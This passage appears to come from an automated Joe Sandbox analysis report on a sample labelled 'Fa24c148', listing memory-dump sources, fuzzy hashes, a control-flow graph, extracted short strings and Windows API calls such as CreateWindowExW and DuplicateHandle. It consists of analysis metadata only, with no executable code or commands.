                                                                                                    • Opcode Fuzzy Hash: 3f7b5ba25006b89f4a92b7c345e8d554b1a876e76159534fb5bc7446c51ee131
                                                                                                    • Instruction Fuzzy Hash: BF5142B4D002498FDB04DFAAC948BEEBBF1EB89310F208159E149B7260DB749985CF65

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2400 165f38-165f5a 2401 165f70-165f7b 2400->2401 2402 165f5c-165f60 2400->2402 2405 166023-16604f 2401->2405 2406 165f81-165f83 2401->2406 2403 165f62-165f6e 2402->2403 2404 165f88-165f8f 2402->2404 2403->2401 2403->2404 2408 165f91-165f98 2404->2408 2409 165faf-165fb8 2404->2409 2412 166056-1660ae 2405->2412 2407 16601b-166020 2406->2407 2408->2409 2410 165f9a-165fa5 2408->2410 2479 165fba call 367ee588 2409->2479 2480 165fba call 165f38 2409->2480 2410->2412 2413 165fab-165fad 2410->2413 2432 1660b0-1660b6 2412->2432 2433 1660bd-1660cf 2412->2433 2413->2407 2414 165fc0-165fc2 2415 165fc4-165fc8 2414->2415 2416 165fca-165fd2 2414->2416 2415->2416 2419 165fe5-166004 2415->2419 2420 165fd4-165fd9 2416->2420 2421 165fe1-165fe3 2416->2421 2426 166006-16600f 2419->2426 2427 166019 2419->2427 2420->2421 2421->2407 2485 166011 call 16afad 2426->2485 2486 166011 call 16af5b 2426->2486 2427->2407 2429 166017 2429->2407 2432->2433 2435 1660d5-1660d9 2433->2435 2436 166163-166165 2433->2436 2437 1660db-1660e7 2435->2437 2438 1660e9-1660f6 2435->2438 2487 166167 call 1662f0 2436->2487 2488 166167 call 166300 2436->2488 2444 1660f8-166102 2437->2444 2438->2444 2439 16616d-166173 2442 166175-16617b 2439->2442 2443 16617f-166186 2439->2443 2445 1661e1-16622f 2442->2445 2446 16617d 2442->2446 2449 166104-166113 2444->2449 2450 16612f-166133 2444->2450 2481 166231 call 367eeb58 2445->2481 2482 166231 call 367eebe3 2445->2482 2483 166231 call 367ee950 2445->2483 2484 166231 call 367ee941 2445->2484 2446->2443 2461 166115-16611c 2449->2461 2462 166123-16612d 2449->2462 2451 166135-16613b 2450->2451 2452 16613f-166143 2450->2452 2454 16613d 2451->2454 2455 166189-1661da 2451->2455 2452->2443 2456 166145-166149 2452->2456 2454->2443 2455->2445 2458 166247-16625e 2456->2458 2459 16614f-166161 2456->2459 2459->2443 2461->2462 2462->2450 2474 166237-166240 2474->2458 2479->2414 2480->2414 2481->2474 2482->2474 2483->2474 2484->2474 2485->2429 2486->2429 2487->2439 2488->2439
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Hbq$Hbq
                                                                                                    • API String ID: 0-4258043069
                                                                                                    • Opcode ID: 083f783d397133cfcac68b62597882d4c76e05f6e647267693f05ceb219f31ed
                                                                                                    • Instruction ID: 997efa60dab167975cf3c7c6f84ca3a360190275c04c0ac2d8efccd4c8f41bce
                                                                                                    • Opcode Fuzzy Hash: 083f783d397133cfcac68b62597882d4c76e05f6e647267693f05ceb219f31ed
                                                                                                    • Instruction Fuzzy Hash: 9891AC303042548FDB199F28CC94A6E7BE6BFC9300F148569E8468B3A2CF35CD52DB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956050543.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367e0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LR^q$LR^q
                                                                                                    • API String ID: 0-4089051495
                                                                                                    • Opcode ID: 9af409901af364a48b3c278f59c9f0423e88e75e7a290dc111fb1ee7f3162e93
                                                                                                    • Instruction ID: 29b4ad02b41699cd4b821333105bc5b640f141e9159dad6648fae389b99c41f6
                                                                                                    • Opcode Fuzzy Hash: 9af409901af364a48b3c278f59c9f0423e88e75e7a290dc111fb1ee7f3162e93
                                                                                                    • Instruction Fuzzy Hash: E681CE34B202018FDB04DF79C854A6E7BF6BF89644B5185A9E506DF3A1DB30DC06CB96
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q
                                                                                                    • API String ID: 0-2697143702
                                                                                                    • Opcode ID: 74ccb03b7c01aca085c4ec5e1dba1585b08f17ebf30fc67a56305ffa311a260a
                                                                                                    • Instruction ID: 57ca7073fdf24729ac6fb430fb6c310f9ed2577866409f24f4a358ab7b8aa86a
                                                                                                    • Opcode Fuzzy Hash: 74ccb03b7c01aca085c4ec5e1dba1585b08f17ebf30fc67a56305ffa311a260a
                                                                                                    • Instruction Fuzzy Hash: 8A51A0307002459FDB04DFA9CC44B6ABBEAEF89350F14846AE909CB365DB71DC51CBA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Xbq$Xbq
                                                                                                    • API String ID: 0-1243427068
                                                                                                    • Opcode ID: 7d0b710af92f251e48d14663c35f2e9180c558531461caddde34e82db76a3ad9
                                                                                                    • Instruction ID: 092182fea3a4829e4483cce9976b429388d5a698ed7b2b12d0842e03c61f0c9b
                                                                                                    • Opcode Fuzzy Hash: 7d0b710af92f251e48d14663c35f2e9180c558531461caddde34e82db76a3ad9
                                                                                                    • Instruction Fuzzy Hash: 95310731B042248BDF1C4ABA8D9427EA5EAEFC4311F54443EE826D3390DF75CE5597A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $^q$$^q
                                                                                                    • API String ID: 0-355816377
                                                                                                    • Opcode ID: 418f00e6b630d1e0435417c52f5e893f56d5de9137118f14299c57f0c7051f36
                                                                                                    • Instruction ID: 873f8d36ffead196df8fe7bb78e341ea6e87e4b0f5c98f8200e136245ec6c150
                                                                                                    • Opcode Fuzzy Hash: 418f00e6b630d1e0435417c52f5e893f56d5de9137118f14299c57f0c7051f36
                                                                                                    • Instruction Fuzzy Hash: 473192303441158FC7298B3DDC9493E7BA7BB85710B254AEAF402CB6A1DF29DC918795
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 8cq$TJcq
                                                                                                    • API String ID: 0-1920894394
                                                                                                    • Opcode ID: 0caa07bad7a9b17bd156cc5e158c96c2b3fa9937325983fa3de03bc74f82c5d4
                                                                                                    • Instruction ID: 1f6219303502d705f95cb86507397b8cc0dfd489a9b9d2900dd189301c6d741e
                                                                                                    • Opcode Fuzzy Hash: 0caa07bad7a9b17bd156cc5e158c96c2b3fa9937325983fa3de03bc74f82c5d4
                                                                                                    • Instruction Fuzzy Hash: 00311435B002098FCB00DBA8C581E9DBBB2FF88324F295590E505AF365DB70EC858B90
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 8cq$TJcq
                                                                                                    • API String ID: 0-1920894394
                                                                                                    • Opcode ID: 9566dab460ac761d872cf5c8f015277c73ad10337b2e149890e02cf834c43c97
                                                                                                    • Instruction ID: 192f39240373a76909f4b92a0e4c186c3d6d7fc749e91f63368f7e62a5b23862
                                                                                                    • Opcode Fuzzy Hash: 9566dab460ac761d872cf5c8f015277c73ad10337b2e149890e02cf834c43c97
                                                                                                    • Instruction Fuzzy Hash: 3D311535B401098FCB00EFA8C581E9DBBB2FF88324F155594E505AF366DA70EC858B90
                                                                                                    APIs
                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 369246A2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956288985.0000000036920000.00000040.00000800.00020000.00000000.sdmp, Offset: 36920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_36920000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 716092398-0
                                                                                                    • Opcode ID: db5a3dc20dfda9f5348bada3aff9983ca1d34675ce3b42c19e288e84b009bedc
                                                                                                    • Instruction ID: fb52f3edaaf7217ff363200a251273abbee0fcc291840185db0628b67d07aba8
                                                                                                    • Opcode Fuzzy Hash: db5a3dc20dfda9f5348bada3aff9983ca1d34675ce3b42c19e288e84b009bedc
                                                                                                    • Instruction Fuzzy Hash: 5451C0B1D00349DFDB14CF9AC980ADEBBB5BF48714F20812AE819AB214D7709981CF91
                                                                                                    APIs
                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 369246A2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956288985.0000000036920000.00000040.00000800.00020000.00000000.sdmp, Offset: 36920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_36920000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 716092398-0
                                                                                                    • Opcode ID: c2533b0d41e2e119545ab39634be518c216d6bd6c78f9314015d0dcab98792de
                                                                                                    • Instruction ID: 62ef55c7c7e8a3f81857a3cbd5d3826205ffb597e2c6d43b4648666cfbc07dfe
                                                                                                    • Opcode Fuzzy Hash: c2533b0d41e2e119545ab39634be518c216d6bd6c78f9314015d0dcab98792de
                                                                                                    • Instruction Fuzzy Hash: 6741D0B1D00349DFDF14CF9AC980ADEBBB5BF48714F20812AE819AB214D7709981CF91
                                                                                                    APIs
                                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 36926C11
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956288985.0000000036920000.00000040.00000800.00020000.00000000.sdmp, Offset: 36920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_36920000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallProcWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2714655100-0
                                                                                                    • Opcode ID: 6e965e81e6b2acf6e070bbdd1df88fbda017b4dfa281a47b00fdd4091bf82595
                                                                                                    • Instruction ID: 1aaa083ad4645b9459c38d50e66a1be8571525cdc1391cfc89686254cd2b51ec
                                                                                                    • Opcode Fuzzy Hash: 6e965e81e6b2acf6e070bbdd1df88fbda017b4dfa281a47b00fdd4091bf82595
                                                                                                    • Instruction Fuzzy Hash: D24138B9A00309CFDB04DF99C884A9ABBF5FF89314F24C459E519AB325D774A941CFA0
                                                                                                    APIs
                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36839C3F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956210818.0000000036830000.00000040.00000800.00020000.00000000.sdmp, Offset: 36830000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_36830000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DuplicateHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 3793708945-0
                                                                                                    • Opcode ID: 7ba979980378f18a63141fb6e2814ee2eaca06c5c00d3f8b7d46c392a9e5428a
                                                                                                    • Instruction ID: e88932e17e3097a9d14e763c648bc6aae932c7a6a113cfdb948c660263bbde0f
                                                                                                    • Opcode Fuzzy Hash: 7ba979980378f18a63141fb6e2814ee2eaca06c5c00d3f8b7d46c392a9e5428a
                                                                                                    • Instruction Fuzzy Hash: 9F2105B59002499FDB10CFAAD984ADEFFF4EB48320F14841AE958A7350D374A941CFA5
                                                                                                    APIs
                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 36839C3F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956210818.0000000036830000.00000040.00000800.00020000.00000000.sdmp, Offset: 36830000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_36830000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DuplicateHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 3793708945-0
                                                                                                    • Opcode ID: 424b9fbeefa4cc176cafedc318d02b6573edbd789b7ae13e65954cf8b802e33f
                                                                                                    • Instruction ID: 9deb4f514f26457581ab194e0357508ae0bf7daaedb4bde251d69fb4d257562d
                                                                                                    • Opcode Fuzzy Hash: 424b9fbeefa4cc176cafedc318d02b6573edbd789b7ae13e65954cf8b802e33f
                                                                                                    • Instruction Fuzzy Hash: FD21C4B59012589FDB10CFAAD984ADEBFF4EB48320F14841AE958A7310D374A945CFA5
                                                                                                    APIs
                                                                                                    • OleInitialize.OLE32(00000000), ref: 369290ED
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956288985.0000000036920000.00000040.00000800.00020000.00000000.sdmp, Offset: 36920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_36920000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2538663250-0
                                                                                                    • Opcode ID: 2d85cd6c1e82bbcba8bd627ad5632b88ad64aef98938d50eeb34341261133972
                                                                                                    • Instruction ID: 2a00b6f35d5dfbc3fd4050c21461af2fdf456b3d7d8e1563abc5e6557a593e9c
                                                                                                    • Opcode Fuzzy Hash: 2d85cd6c1e82bbcba8bd627ad5632b88ad64aef98938d50eeb34341261133972
                                                                                                    • Instruction Fuzzy Hash: 281145B1900348CFDB20DF9AD444BDEBBF8EB48320F208459D558A7310C374A980CFA5
                                                                                                    APIs
                                                                                                    • OleInitialize.OLE32(00000000), ref: 369290ED
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956288985.0000000036920000.00000040.00000800.00020000.00000000.sdmp, Offset: 36920000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_36920000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2538663250-0
                                                                                                    • Opcode ID: c0dc2b68cd941069df8d646f14a8905cbdf7d8220f7e2d707a685c67ac936d5b
                                                                                                    • Instruction ID: cf80cf8258e57f07ea0c8a0729cefb8ca55ad6b583568696ce846ade8834b605
                                                                                                    • Opcode Fuzzy Hash: c0dc2b68cd941069df8d646f14a8905cbdf7d8220f7e2d707a685c67ac936d5b
                                                                                                    • Instruction Fuzzy Hash: 0A1100B59002488FCB20DF9AD544B9EBBF8EF48320F20845AD559A7210D379A680CFA5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Hbq
                                                                                                    • API String ID: 0-1245868
                                                                                                    • Opcode ID: f139791038ca73ece1e803429800ae75821f2b044ee8fe6e631834d3738951f0
                                                                                                    • Instruction ID: 42dc206537c47259f729e379118f9af26d25bce8480a6b22147902bdb69c32a1
                                                                                                    • Opcode Fuzzy Hash: f139791038ca73ece1e803429800ae75821f2b044ee8fe6e631834d3738951f0
                                                                                                    • Instruction Fuzzy Hash: 6A319330B042449FC745EFB998599AE7BFAEFC9340B1044B9E519DB251DE348E02CB60
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Hbq
                                                                                                    • API String ID: 0-1245868
                                                                                                    • Opcode ID: 808cabc8df55ebb9d80367302de69a1955c16b7003aad486b886c756ef728da9
                                                                                                    • Instruction ID: 37b6863c05847d345a71c752f7c9074087d38c4e3b69e494615f44051c848ab4
                                                                                                    • Opcode Fuzzy Hash: 808cabc8df55ebb9d80367302de69a1955c16b7003aad486b886c756ef728da9
                                                                                                    • Instruction Fuzzy Hash: B421F030B042489FD715AB79C856A9E7BB7FFC5314F2080AAE5059B2A2CF708E06CB51
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: F
                                                                                                    • API String ID: 0-2730988801
                                                                                                    • Opcode ID: ad95636b003b5cf5d6158286b2c2db9472118d4e3ecc8945f7805780085034b0
                                                                                                    • Instruction ID: dbc319d4ccc2dfc757626f9d043e944be705bff0463e35c984fb802bf7c3d21e
                                                                                                    • Opcode Fuzzy Hash: ad95636b003b5cf5d6158286b2c2db9472118d4e3ecc8945f7805780085034b0
                                                                                                    • Instruction Fuzzy Hash: 20314734D052498FCB02DFB8D8446EEBFF4EF4A300F0451AAD844A7261EB345A85CBA2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Hbq
                                                                                                    • API String ID: 0-1245868
                                                                                                    • Opcode ID: 4cd29fcd9d74b67477baecbe059d71b7264fa6cc8ea629264b0cd07e6aff7d98
                                                                                                    • Instruction ID: 200321ac159bfe25523bcb504e531a84a8bc4ed572a51ddf702321738aa8c4b4
                                                                                                    • Opcode Fuzzy Hash: 4cd29fcd9d74b67477baecbe059d71b7264fa6cc8ea629264b0cd07e6aff7d98
                                                                                                    • Instruction Fuzzy Hash: BB219271B041489FDB44EFB9D8559AE7BF6EF88300F108179E519AB256DF309E12CB90
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 3R3
                                                                                                    • API String ID: 0-3996245019
                                                                                                    • Opcode ID: ef50049d124e9689568eb409b14820ecaa1945e24e4aacd45f21edd5e944a362
                                                                                                    • Instruction ID: 8cb2749450478b1f919c436501c8707738dc89ac9a83b801a3cc2037ae36c701
                                                                                                    • Opcode Fuzzy Hash: ef50049d124e9689568eb409b14820ecaa1945e24e4aacd45f21edd5e944a362
                                                                                                    • Instruction Fuzzy Hash: 942104357055118FC7199B2ACC9452EB7A2FFC97557194079E80ADB7A8CF34DC02CB90
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: *Z3U
                                                                                                    • API String ID: 0-1619721067
                                                                                                    • Opcode ID: 257195f724bcc051c6b5f84655ddfcc0ba99e566d959637d4553a53bb1bacc4f
                                                                                                    • Instruction ID: 917df9ebbec0db9d5a03f97ab5dbba5ba5d91f248569b6f1456bfa01dd76e921
                                                                                                    • Opcode Fuzzy Hash: 257195f724bcc051c6b5f84655ddfcc0ba99e566d959637d4553a53bb1bacc4f
                                                                                                    • Instruction Fuzzy Hash: 0711563A3006008FD704CF29E589B46B7A2FF88769F10846AE50A8F761CAB1EC04CB10
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d30bc6d6a6c34181fcaf72abdf7312cc01c65efa5377989531507190d8ff2a2f
                                                                                                    • Instruction ID: 126717506f41650ea5528703733316cfac35a51c8b11992fdb30d832a838c309
                                                                                                    • Opcode Fuzzy Hash: d30bc6d6a6c34181fcaf72abdf7312cc01c65efa5377989531507190d8ff2a2f
                                                                                                    • Instruction Fuzzy Hash: 9112A834421653DFE2402B60EEAC12E7BA1FB5F727710AD24F10FC1865AB7546DACB62
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 78f3a85fd9332a044de1dc13a109f2288f716498f918f2300b4ef67a9e1a2a96
                                                                                                    • Instruction ID: 877dc20844571569cfaf0eeb26570e7136c213fb03faa32dc55375057ca7ac21
                                                                                                    • Opcode Fuzzy Hash: 78f3a85fd9332a044de1dc13a109f2288f716498f918f2300b4ef67a9e1a2a96
                                                                                                    • Instruction Fuzzy Hash: CE812476B042049FD710DB79E846AAABBB7FFC5328F14852AE419DB750DB72D802CB50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8d8b6e564826ba0fb2a929ef90ffd459e19b16fd346c1be7b3cfb8024f67f904
                                                                                                    • Instruction ID: 0bea107e73810bf4fcb8d7da97d01a124a26a1b74aa43fc6d2c92f8196fbabb1
                                                                                                    • Opcode Fuzzy Hash: 8d8b6e564826ba0fb2a929ef90ffd459e19b16fd346c1be7b3cfb8024f67f904
                                                                                                    • Instruction Fuzzy Hash: C27139347006058FCB19DF68CCA4A6E7BE6AF9A740B1942A9E806DB3B1DF70DC51CB51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956050543.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367e0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8e84c368f6e9f46ebb1ff1afb84d1e492006b6416cd31d726a6835d364592990
                                                                                                    • Instruction ID: e6ae26c308ef3d2f64c9569fa692899ca8a8c6187a81d3d93b3289662be042cf
                                                                                                    • Opcode Fuzzy Hash: 8e84c368f6e9f46ebb1ff1afb84d1e492006b6416cd31d726a6835d364592990
                                                                                                    • Instruction Fuzzy Hash: 89718E74E00218DFDB04DFA9C995A9DBBB2FF89300F648129E408BB365DB359986CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956050543.00000000367E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367E0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367e0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a3ec5ae3398c780814b6ad34449f12bf4d1141669c193e8f775e53bbd090d182
                                                                                                    • Instruction ID: bf149be12bc05246f2085673ed82d7d43762c21aecfe9e7418242cb63be091c2
                                                                                                    • Opcode Fuzzy Hash: a3ec5ae3398c780814b6ad34449f12bf4d1141669c193e8f775e53bbd090d182
                                                                                                    • Instruction Fuzzy Hash: 66719D74E00218DFDB05DFA9C994ADDBBB2EF89300F608129E404BB364DB359986CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956079241.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367f0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d660d8cb0381ef7c57a44b737d4458ab86f06bb066c7929c1c6a28c7b960a57f
                                                                                                    • Instruction ID: 0e926e2fb91d2e5740b6551199778a3e132b60c1f760765b3cf58b6497e750e0
                                                                                                    • Opcode Fuzzy Hash: d660d8cb0381ef7c57a44b737d4458ab86f06bb066c7929c1c6a28c7b960a57f
                                                                                                    • Instruction Fuzzy Hash: EF71AF74E00218DFDB04DFA5C994AAEBBB6FF89300F608129E404BB364DB359986CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2956079241.00000000367F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 367F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_367f0000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 384e119ec21ebdf1f84918cde191382c9444079bc6eec61ec1812513c0396915
                                                                                                    • Instruction ID: a687d662b3a070d1a50ae11e4d4e0a605b7ce6c9a39fa88a27746cc4750af966
                                                                                                    • Opcode Fuzzy Hash: 384e119ec21ebdf1f84918cde191382c9444079bc6eec61ec1812513c0396915
                                                                                                    • Instruction Fuzzy Hash: 7C719F74E00218DFDB04DFA9C995A9DBBB2FF89300F608129E414BB365DB359986CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9dbc223a45eae4f67543ff8200cf872fc6b6d69779792d3d3068bc791d64b76a
                                                                                                    • Instruction ID: 731d3740b3c7130ed55245903a9d780468dd01766d2dede21c08d68b0ab2db18
                                                                                                    • Opcode Fuzzy Hash: 9dbc223a45eae4f67543ff8200cf872fc6b6d69779792d3d3068bc791d64b76a
                                                                                                    • Instruction Fuzzy Hash: 94610234E01218DFDB15DFA5D944AAEBBB2FF88304F208529E809BB364DB355A46DF40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
